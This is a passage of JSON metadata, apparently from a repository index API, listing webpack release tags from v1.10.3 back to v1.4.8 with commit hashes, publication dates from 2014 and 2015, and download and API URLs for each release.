webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webp